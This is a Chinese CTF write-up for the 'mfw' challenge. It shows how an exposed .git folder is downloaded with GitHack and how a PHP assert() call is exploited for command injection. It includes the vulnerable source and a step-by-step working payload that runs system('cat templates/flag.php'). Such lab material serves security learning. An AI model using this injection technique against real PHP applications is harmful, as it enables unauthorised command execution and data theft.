[CSAW/网络安全] Git泄露+命令执行 攻防世界 mfw 解题详析

Home界面:


Home界面翻译如下:

欢迎访问我的网站!

我自己从头开始写的!

您可以使用上面的链接浏览页面!


About界面:

观察到Git ,联想Git泄露

Git泄露

Git是一个非常流行的开源分布式版本控制系统,它被广泛用于协同开发和代码管理。许多网站和应用程序都使用Git作为其代码管理系统,并将其部署到生产环境中以维护其代码库。

然而,在配置不当的情况下,可能会导致.git文件夹被直接部署到线上环境中,这可能会导致Git泄露问题。

此时可使用githack等工具下载站点存储库的整个代码历史记录和配置信息。

漏洞利用

通过枚举工具或搜索引擎来查找带有.git文件夹的存储库,以获取包含未加密密码、凭据和敏感信息的站点代码库。

如GET/.git以确认是否存在git泄露

查看是否存在Git漏洞

Payload:/.git

由上图,存在Git漏洞。

下载泄漏文件

利用python的githacker库下载泄露文件


GitHack的安装本文不再赘述

详情参考: Python/网络安全 Git漏洞之Githack工具基本安装及使用详析


打开Githack,输入Payload:
python GitHack.py http://61.147.171.105:61017/.git

得到文件

代码审计

其中,index.php文件存在以下代码:

复制代码
<?php
 
if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}
//传入page参数,如果没有,则设置为home
           
$file = "templates/" . $page . ".php";
//将page参数拼接成一个templates下的php文件,设置为变量file
 
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
//判断file中是否有 ..  如果有则直接退出 这是为了防止目录遍历
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!")
//检查指定的文件是否存在。如果文件不存在,将抛出另一个断言错误并停止脚本的执行。
?>

姿势

由于该代码仅对目录遍历进行防范,因此可构造POC,执行系统命令。

由于下载得到的文件中,templates目录路径下含有flag.php,故应读取该文件中内容

构造POC如下:

复制代码
?page=qiu or system("cat templates/flag.php");

由于qiu参数不存在,page=qiu返回false 可利用or执行system函数

同时观察到该行代码:

复制代码
assert("strpos('参数', '..') === false")

如果将上面的POC传入,则变为

复制代码
assert("strpos('qiu or system("cat templates/flag.php");', '..') === false") 

qiu未被括号闭合,该语句注入不成功

重新构造POC如下:

复制代码
?page=qiu') or system("cat templates/flag.php");

则语句变为:

复制代码
assert("strpos('qiu') or system("cat templates/flag.php");', '..') === false") 

再用//将后面的语句注释掉即可

构造POC如下:

复制代码
?page=qiu') or system("cat templates/flag.php");//

则语句变为:

复制代码
assert("strpos('qiu') or system("cat templates/flag.php");//', '..') === false") 

最后的语句如下:

复制代码
assert("strpos('qiu') or system("cat templates/flag.php");

即可实现命令的成功执行:

总结

该题考察Git泄露之存储库读取姿势代码审计命令执行,读者可躬身实践。

相关推荐
慕容引刀42 分钟前
告别Commit信息纠结:使用Git AI Commit插件实现规范化提交
人工智能·git·github·visual studio code·visual studio
风途科技~1 小时前
河道流量监测不用下水!雷达水流测速仪非接触测流更安全
人工智能·安全
味悲1 小时前
XSS、CSRF、SSRF学习笔记
安全·xss·csrf
万点科技码农1 小时前
紧跟7月9日行业变革,西安万点网络科技一体化服务助力企业数字化安全转型
安全
Chengbei111 小时前
SoloXSS:一款现代化的自托管 XSS平台
人工智能·安全·web安全·网络安全·自动化·xss·安全架构
white_ant2 小时前
安全认证与 API 网关
安全
xixixi7777712 小时前
三大 AI 安全里程碑:Akamai 高危风险预警、智能体水印强制落地、PQC 量子安全全产业链统一
大数据·人工智能·安全·ai·大模型·智能体·政策
hz5678914 小时前
电子远程评标系统哪家好?安全、合规、易用平台评测指南
安全·云计算·音视频·实时音视频·信息与通信
MartinYeung515 小时前
[论文学习]大语言模型安全综述:攻击、防御、对齐、度量与护栏的深度解析
学习·安全·语言模型
敲代码的嘎仔15 小时前
实习日志day6--实习日志day6--title命名规范化&businessType纠正&补充缺失的@Log注解&报警与通信模块补充&产出阶段总结文档
java·开发语言·人工智能·git·python·实习·大二